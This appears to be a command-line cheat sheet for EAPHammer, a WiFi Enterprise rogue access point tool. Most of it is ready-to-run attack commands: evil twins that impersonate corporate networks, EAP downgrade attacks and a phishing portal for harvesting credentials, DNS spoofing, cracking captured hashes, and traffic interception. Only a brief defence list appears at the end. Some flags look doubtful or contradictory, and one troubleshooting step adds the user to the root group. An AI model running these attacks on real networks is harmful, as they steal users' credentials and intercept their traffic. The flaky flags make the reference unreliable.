EAPHammer

EAPHammer is a comprehensive rogue access point framework for testing WiFi Enterprise (WPA-Enterprise) security. It creates evil twins that perform credential harvesting through various EAP downgrade attacks.

Installation

Linux/Ubuntu

# Install dependencies
sudo apt update
sudo apt install hostapd dnsmasq python3 python3-pip git

# Clone EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer

# Install Python requirements
pip3 install -r requirements.txt

# Optional: Install from package
sudo python3 setup.py install

Kali Linux

# EAPHammer pre-installed
eaphammer --version

# If not installed
sudo apt install eaphammer
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo python3 eaphammer.py --help

macOS

# Install via git
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
pip3 install -r requirements.txt

# Make executable
chmod +x eaphammer.py

Quick Start

# Show available options
python3 eaphammer.py --help

# List wireless interfaces
python3 eaphammer.py -h

# Basic evil twin AP
python3 eaphammer.py -i wlan0 -e EvilNetwork -c 6 --hostapd

Certificate Generation

Self-Signed Certificates

# Generate CA certificate (do once)
python3 eaphammer.py --gen-ca --cert-dir certs

# Generate server certificate
python3 eaphammer.py --gen-server-cert --cert-dir certs --hostname 192.168.1.1

# Generate P12 certificate for Android
python3 eaphammer.py --gen-p12 --cert-dir certs --password cisco

FreeRADIUS Integration

# Generate certificates for FreeRADIUS
python3 eaphammer.py --freeradius --cert-dir certs

# Configure FreeRADIUS
cp certs/server.crt /etc/freeradius/3.0/certs/
cp certs/server.key /etc/freeradius/3.0/certs/
sudo chown freerad:freerad /etc/freeradius/3.0/certs/server.*

Evil Twin / Rogue AP Creation

Basic Evil Twin

# Create evil twin of legitimate network
python3 eaphammer.py \
  -i wlan0 \
  -e CorporateWiFi \
  -c 6 \
  -k DefaultPassword123

# With ESSID spoofing
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -bssid AA:BB:CC:DD:EE:FF \
  -c 6

Enterprise Network Impersonation

# Impersonate WPA-Enterprise network
python3 eaphammer.py \
  -i wlan0 \
  -e CompanyWiFi \
  -c 6 \
  --auth wpa-eap \
  --encryption ccmp \
  --eap-methods peap ttls

# With custom certificate
python3 eaphammer.py \
  -i wlan0 \
  -e CompanyWiFi \
  -c 6 \
  --cert-dir certs \
  --server-cert-file server.crt

EAP Attack Methods

PEAP Downgrade Attack

# PEAP (Protected EAP) attack - downgrade to MS-CHAPv2
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap peap \
  --inner-auth mschapv2 \
  --no-ssl-verification

# Force older PEAP version
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap peap \
  --inner-auth mschapv2 \
  --peap-version 0

TTLS Downgrade Attack

# TTLS (Tunneled TLS) attack
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap ttls \
  --inner-auth pap \
  --no-ssl-verification

# TTLS with PAP credential harvesting
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap ttls \
  --inner-auth pap \
  --pap-username testuser

GTC (Generic Token Card) Downgrade

# GTC downgrade - most aggressive
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap gtc \
  --inner-auth gtc \
  --no-ssl-verification

# GTC with custom prompt
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --eap gtc \
  --gtc-prompt "Enter corporate credentials"

Credential Harvesting & Logging

Credential Capture

# Enable credential logging
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --log credentials.log \
  --verbose

# Capture all authentication attempts
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --log auth_attempts.txt \
  --log-all

# Real-time credential display
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  -v -v

FreeRADIUS Logging

# Monitor FreeRADIUS auth attempts
tail -f /var/log/freeradius/radius.log

# Parse authentication logs
grep -i "user.*accepted\|user.*rejected" /var/log/freeradius/radius.log

# Extract credentials from captured packets
tshark -i wlan0 -Y "eap" -T fields -e eap.code -e eap.type -e wlan.da > eap_capture.txt

Network Configuration

DHCP & DNS Setup

# Configure dnsmasq for DHCP/DNS
cat > dnsmasq.conf << EOF
interface=wlan0
bind-interfaces
dhcp-range=192.168.100.2,192.168.100.50,12h
server=8.8.8.8
address=/#/192.168.100.1
EOF

# Launch with EAPHammer
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --ip-pool 192.168.100.1/24

DNS Spoofing

# Redirect all DNS traffic to AP
python3 eaphammer.py \
  -i wlan0 \
  -e TargetNetwork \
  -c 6 \
  --dns-spoof \
  --dns-port 53

# Custom DNS answers
cat > dns.conf << EOF
*.internal.corp=192.168.100.1
mail.corp=192.168.100.100
EOF

Attack Scenarios

Full Enterprise Network Impersonation

#!/bin/bash
# Complete evil twin setup

INTERFACE="wlan0"
TARGET_SSID="CorporateWiFi"
TARGET_CHANNEL="6"
CERT_DIR="./certs"

# 1. Generate certificates (first time only)
if [ ! -d "$CERT_DIR" ]; then
    python3 eaphammer.py --gen-ca --cert-dir $CERT_DIR
    python3 eaphammer.py --gen-server-cert --cert-dir $CERT_DIR
fi

# 2. Launch evil twin with PEAP attack
python3 eaphammer.py \
  -i $INTERFACE \
  -e $TARGET_SSID \
  -c $TARGET_CHANNEL \
  --auth wpa-eap \
  --eap peap \
  --inner-auth mschapv2 \
  --no-ssl-verification \
  --log credentials.log \
  -v

# 3. Monitor credentials
echo "[*] Credentials saved to credentials.log"

Credential Harvesting with Phishing Portal

# Launch AP with hostile portal
python3 eaphammer.py \
  -i wlan0 \
  -e FreeWiFi \
  -c 6 \
  --hostile-portal \
  --portal-page login.html

# Portal redirects all HTTP to credential harvesting page
# Users must enter credentials to proceed

Post-Exploitation

Captured Credential Cracking

# Extract captured hashes
grep -oP 'NT.*' credentials.log > hashes.txt

# Crack with hashcat (NTLM)
hashcat -m 1000 hashes.txt wordlist.txt

# Crack with John the Ripper
john --format=netntlm hashes.txt --wordlist=wordlist.txt

Network Pivot & MITM

# Forward traffic while capturing
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

# Monitor with mitmproxy
mitmproxy -i wlan0 -b 192.168.100.1 --mode transparent

Troubleshooting

Common Issues

Issue: hostapd fails to start

# Check interface permissions
sudo usermod -aG root $USER

# Kill conflicting processes
sudo pkill wpa_supplicant
sudo pkill NetworkManager

# Restart from scratch
sudo airmon-ng check kill
python3 eaphammer.py -i wlan0 -e TestAP -c 6

Issue: No clients connecting

# Verify AP is broadcasting
iw wlan0 info

# Check certificate validity
openssl x509 -in server.crt -text -noout

# Try without SSL verification
python3 eaphammer.py -i wlan0 -e TargetNetwork -c 6 --no-ssl-verification

Issue: Credentials not captured

# Verify FreeRADIUS is accepting connections
radtest testuser testpass 127.0.0.1 0 testing123

# Check logs
sudo tail -f /var/log/freeradius/radius.log

# Enable verbose logging
python3 eaphammer.py -i wlan0 -e TargetNetwork -c 6 -vvv

Defense Against EAPHammer

• Implement certificate pinning on clients
• Monitor for rogue APs on network
• Use 802.1X with proper certificate validation
• Deploy IDS/IPS to detect suspicious traffic
• Educate users to verify network names
• Require manual certificate acceptance

Related Tools

• Hostapd - AP software (used by EAPHammer)
• FreeRADIUS - RADIUS server for auth
• Reaver - WPS brute-force
• Aircrack-ng - WiFi auditing suite
• Bettercap - MITM and network tool

---

Last updated: 2026-03-30 | EAPHammer Master